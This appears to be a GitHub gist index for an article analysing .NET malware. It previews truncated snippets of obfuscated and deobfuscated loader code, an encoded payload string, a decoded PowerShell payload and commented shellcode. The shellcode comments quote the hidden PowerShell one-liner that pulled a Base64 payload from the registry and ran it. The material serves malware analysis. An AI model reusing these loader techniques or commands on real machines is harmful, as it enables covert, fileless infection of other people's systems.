View passthru.cs
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Text; | |
using System.Threading.Tasks; | |
namespace passthru | |
{ | |
class Program | |
{ |
View dotnet_malware_article_obfuscated_full.cs
private static void pwS3x7Sg(string[] HA36XMPY) | |
{ | |
int num = 5; | |
string text; | |
string a; | |
string location; | |
byte[] xnnXVZCo; | |
Assembly assembly; | |
string a2; | |
for (;;) |
View dotnet_malware_article_obfuscated_partial.cs
private static void pwS3x7Sg(string[] HA36XMPY) | |
{ | |
int num = 5; | |
string text; | |
string a; | |
string location; | |
byte[] xnnXVZCo; | |
Assembly assembly; | |
string a2; | |
for (;;) |
View dotnet_malware_article_deobfuscated.cs
private static void pwS3x7Sg(string[] args) { | |
Assembly executingAssembly = Assembly.GetExecutingAssembly(); | |
byte[] xnnXVZCo = rYChEj24.m861PYDG(executingAssembly); | |
byte[] xnnXVZCo2 = rYChEj24.Q8sHxNtH(executingAssembly); | |
Assembly assembly = Assembly.Load(rYChEj24.ygv4ageb(xnnXVZCo2)); | |
string a = DFsEYbtO.smethod_1(293); | |
string a2 = DFsEYbtO.smethod_1(302); | |
string location = Assembly.GetEntryAssembly().Location; | |
string text = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + DFsEYbtO.smethod_1(311) + Path.GetFileName(location); | |
if (a2 == DFsEYbtO.smethod_1(316) && !File.Exists(text)) { |
View dotnet_malware_article_convert_resource.cs
static void Main() | |
{ | |
try | |
{ | |
//IntPtr fResource = FindResource(new IntPtr(0), new IntPtr(130), new IntPtr(23)); | |
//uint sResource = SizeofResource(new IntPtr(0), fResource); | |
//IntPtr lResource = LoadResource(new IntPtr(0), fResource); | |
//IntPtr dResource = LockResource(lResource); | |
//CtNmG = new byte[sResource]; |
View dotnet_malware_article_decode.py
encoded_datastring = "pvlkb%V|vq`h>\b\u000fpvlkb%V|vq`h+LJ>\b\u000fpvlkb%V|vq`h+Q`}q>\b\u000fpvlkb%V|vq`h+W`ci`fqljk>\b\u000fpvlkb%V|vq`h+Qmw`dalkb>\b\u000fpvlkb%V|vq`h+Wpkqlh`+Lkq`wjuV`wslf`v>\b\u000fpvlkb%V|vq`h+Awdrlkb>\b\u000f\b\u000fkdh`vudf`%HBfrR}vhhbK_\b\u000f~\b\u000f\fupgilf%fidvv%lAu}~upgilf%sjla%wGKc-,~\b\u000fvmjwq%Mh|p%8%(43457>%\u000f%g|q`^X%Mh|pMh|p%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'Mh|p',>cijdq%FpJF%8%6+017104@(5<C>%\u000fvmjwq%`rsV%8%44270>%\u000f%g|q`^X%`rsV`rsV%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'`rsV',>pijkb%nhgG%8%47=7=32151133040<>%\u000f\b\u000fxupgilf%sjla%|fB@-,~\b\u000flkq%U_rI%8%176<=0>%\u000frmli`-U_rI%88%176<=0,~\b\u000fU_rI%8%U_rI%.%702154>\b\u000fxijkb%SbNm%8%4<74=04541520<522>%\u000flkq%VrnW%8%31445=22>%\u000flc-VrnW%88%45272<,~\b\u000fVrnW%8%VrnW%.%713440>\b\u000fxvqwlkb%rLBA%8%'IjcP'>%\u000f%Fjkvji`+Rwlq`Ilk`-rLBA,>\b\u000fxupgilf%sjla%QNFF-,~\b\u000fijkb%U@WV%8%3573524<6<<5265<=>%\u000fvmjwq%|]qt%8%421<7>%\u000f%g|q`^X%|]qt|]qt%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'|]qt',>pijkb%FfQs%8%24< |
View dotnet_malware_article_decoded.cs
using System; | |
using System.IO; | |
using System.Text; | |
using System.Reflection; | |
using System.Threading; |
View powershell_payload_decoded.ps1
# Formatting tweaked for readability as an embedded gist, will not execute | |
# commented as well | |
Set-StrictMode -Version 2 | |
$DoIt = @' | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ( | |
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { |
View powershell_payload_shellcode.asm
; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
View bgzip.py
import gzip | |
import base64 | |
import StringIO | |
# python bgzip.py | |
# H4sIAErhF1wC/8tIzcnJBwCGphA2BQAAAA== | |
# hello | |
def gzip_and_base64(s): | |
out = StringIO.StringIO() |